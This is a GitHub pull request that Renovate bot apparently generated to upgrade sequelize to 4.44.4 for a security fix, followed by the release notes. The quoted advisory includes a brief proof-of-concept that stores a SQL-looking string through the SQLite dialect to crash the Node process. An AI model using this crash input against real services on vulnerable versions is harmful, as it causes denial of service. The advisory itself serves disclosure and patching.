search

spencermize / Veload

Indoor biking for the masses
https://veload.bike
GNU General Public License v3.0
0 stars 0 forks source link

Update dependency sequelize to v4.44.4 [SECURITY] #142

Open renovate[bot] opened 1 year ago

renovate[bot] commented 1 year ago

This PR contains the following updates:

Package Change Age Adoption Passing Confidence
sequelize (source) 4.43.0 -> 4.44.4 age adoption passing confidence

GitHub Vulnerability Alerts

GHSA-fw4p-36j9-rrj3

Versions of sequelize prior to 4.44.4 are vulnerable to Denial of Service (DoS). The SQLite dialect fails to catch a TypeError exception for the results variable. The results value may be undefined and trigger the error on a .map call. This may allow attackers to submit malicious input that forces the exception and crashes the Node process.

The following proof-of-concept crashes the Node process: 

const Sequelize = require('sequelize');

const sequelize = new Sequelize({
    dialect: 'sqlite',
    storage: 'database.sqlite'
});

const TypeError = sequelize.define('TypeError', {
    name: Sequelize.STRING,
});

TypeError.sync({force: true}).then(() => {
    return TypeError.create({name: "SELECT tbl_name FROM sqlite_master"});
});

Recommendation

Upgrade to version 4.44.4 or later.

Release Notes

sequelize/sequelize (sequelize) ### [`v4.44.4`](https://togithub.com/sequelize/sequelize/releases/tag/v4.44.4) [Compare Source](https://togithub.com/sequelize/sequelize/compare/v4.44.3...v4.44.4) ##### Bug Fixes - **sqlite:** properly catch errors ([#​11877](https://togithub.com/sequelize/sequelize/issues/11877)) ([8931bf6](https://togithub.com/sequelize/sequelize/commit/8931bf6c567b4cb3b35de8993cf74c82008b4275)) ### [`v4.44.3`](https://togithub.com/sequelize/sequelize/releases/tag/v4.44.3) [Compare Source](https://togithub.com/sequelize/sequelize/compare/v4.44.2...v4.44.3) ##### Security This release fixes two security issues for MySQL, both affecting same component. https://snyk.io/vuln/SNYK-JS-SEQUELIZE-450221 - **mysql:** json path security issues ([#​11332](https://togithub.com/sequelize/sequelize/issues/11332)) ([efd2f40](https://togithub.com/sequelize/sequelize/commit/efd2f40)) ### [`v4.44.2`](https://togithub.com/sequelize/sequelize/releases/tag/v4.44.2) [Compare Source](https://togithub.com/sequelize/sequelize/compare/v4.44.1...v4.44.2) ##### Bug Fixes - use files and remove .npmignore ([6674a3c](https://togithub.com/sequelize/sequelize/commit/6674a3c)) ### [`v4.44.1`](https://togithub.com/sequelize/sequelize/releases/tag/v4.44.1) [Compare Source](https://togithub.com/sequelize/sequelize/compare/v4.44.0...v4.44.1) ##### Bug Fixes - **pool:** destroy pooled errors properly with replication ([#​11140](https://togithub.com/sequelize/sequelize/issues/11140)) ([a1ccf04](https://togithub.com/sequelize/sequelize/commit/a1ccf04)) ### [`v4.44.0`](https://togithub.com/sequelize/sequelize/releases/tag/v4.44.0) [Compare Source](https://togithub.com/sequelize/sequelize/compare/v4.43.2...v4.44.0) ##### Bug Fixes - **redshift:** allow standard_conforming_strings option ([#​10816](https://togithub.com/sequelize/sequelize/issues/10816)) ([a32263f](https://togithub.com/sequelize/sequelize/commit/a32263f)) ##### Features - **postgres:** enable standard conforming strings when required ([#​10746](https://togithub.com/sequelize/sequelize/issues/10746)) ([c9d3a97](https://togithub.com/sequelize/sequelize/commit/c9d3a97)) ### [`v4.43.2`](https://togithub.com/sequelize/sequelize/releases/tag/v4.43.2) [Compare Source](https://togithub.com/sequelize/sequelize/compare/v4.43.1...v4.43.2) ##### Bug Fixes - **mssql:** subquery handling for order ([#​10769](https://togithub.com/sequelize/sequelize/issues/10769)) ([73d7a65](https://togithub.com/sequelize/sequelize/commit/73d7a65)) ### [`v4.43.1`](https://togithub.com/sequelize/sequelize/releases/tag/v4.43.1) [Compare Source](https://togithub.com/sequelize/sequelize/compare/v4.43.0...v4.43.1) ##### Bug Fixes - **mysql:** boolean TINYINT support ([#​10660](https://togithub.com/sequelize/sequelize/issues/10660)) ([2f92e21](https://togithub.com/sequelize/sequelize/commit/2f92e21))

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

This PR was generated by Mend Renovate. View the repository job log.